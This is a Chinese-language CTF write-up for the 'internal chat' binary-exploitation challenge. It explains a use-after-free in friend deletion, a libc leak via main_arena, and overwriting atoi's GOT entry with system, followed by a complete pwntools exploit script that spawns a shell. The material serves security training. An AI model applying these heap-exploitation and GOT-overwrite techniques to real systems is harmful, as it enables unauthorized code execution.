internal chat圣诞欢乐赛

internal chat

拿到题目开启的保护为

很容易联想到覆写got表来getshell

首先给注册一个用户，用户的结构体如下

struct user
{
    char *user_name;
    __int64 age;
    char description[0x100];
    _QWORD *addr;
    _QWORD *friend_addr;
    __int64  flag;//判断该用户是否被删除
}

漏洞点在于add_delete部分，当删除用户结构体时指针没有置0，产生空指针。且flag指针会被下一个chunk的pre_size覆盖。造成指针始终有值的情况

leak_libc

我们首先删除用户，show处没有判断，打印用户的信息，获取libc地址。

覆写atoi地址

再注册一个用户，设置用户的名称大小为0x128，这样名称地址即为一个用户的地址，将atoi的got表地址写再name地址上，再通过泄露的libc地址，获取atoi地址，登陆被删除的第一个用户。再修改name，可以修改got表内容为system即可getshell

exp

from pwn import *
from LibcSearcher import *
context.log_level='debug'
p=process('./InternalChatSystem')
elf=ELF('./InternalChatSystem')
def debug(addr):
    gdb.attach(p,"b *"+str(addr))
def register(name_size,name,age,payload):
    p.recvuntil("Your choice:")
    p.sendline("2")
    p.recvuntil("Input your name size:")
    p.sendline(str(name_size))
    p.recvuntil("Input your name:")
    p.sendline(name)
    p.recvuntil("Input your age:")
    p.sendline(str(age))
    p.recvuntil("Input your description:")#description<=0x100
    p.sendline(payload)
def login(name):
    p.recvuntil("Your choice:")
    p.sendline("1")
    p.recvuntil("Please input your user name:")
    p.sendline(name)
def send_message(name,title,content):
    p.recvuntil("Your choice:")
    p.sendline('4')
    p.recvuntil("Which user do you want to send a msg to:")
    p.sendline(name)
    p.recvuntil("Input your message title:")
    p.send(title)
    p.recvuntil("Input your content:")
    p.send(content)
def delete(name):
    p.recvuntil("Your choice:")
    p.sendline("3")
    p.recvuntil("Input the friend's name:")
    p.sendline(name)
    p.recvuntil("So..Do u want to add or delete this friend?(a/d)")
    p.sendline("d")
def add(name):
    p.recvuntil("Your choice:")
    p.sendline("3")
    p.recvuntil("Input the friend's name:")
    p.sendline(name)
    p.recvuntil("So..Do u want to add or delete this friend?(a/d)")
    p.sendline("a")
def show():
    p.recvuntil("Your choice:")
    p.sendline("1")
def out():
    p.recvuntil("Your choice:")
    p.sendline("6")
def change(name,age,description):
    p.recvuntil("Your choice:")
    p.send("2")
    p.recvuntil("Input your name:")
    p.send(name)
    p.recvuntil("Input your age:")
    p.send(str(age))
    p.recvuntil("Input your description:")
    p.send(description)

register(0x60,'aaaaaa',30,'1'*0x16)
login('aaaaaa')
send_message('aaaaaa','\x01'*32,'\x02'*32)
add('aaaaaa')
#debug(0x400f51)
delete("aaaaaa")
#debug(0)
show()
p.recvuntil("Age:")
main_arena=int(p.recv(12),16)-88
malloc_hook=main_arena-0x10
print hex(main_arena)

libc=LibcSearcher('__malloc_hook',malloc_hook)
libc_base=malloc_hook-libc.dump('__malloc_hook')
atoi_addr=libc_base+libc.dump('atoi')
system_addr=libc_base+libc.dump('system')
#0choice

print hex(atoi_addr)
print hex(elf.got['atoi'])
out()
register(0x128,p64(elf.got['atoi']),30,'1'*4)
login(p64(atoi_addr))
change(p64(system_addr),18,'a')
p.recvuntil("Your choice:")
p.send('/bin/sh')
p.recvuntil("Your choice:")
p.sendline('/bin/sh')
p.interactive()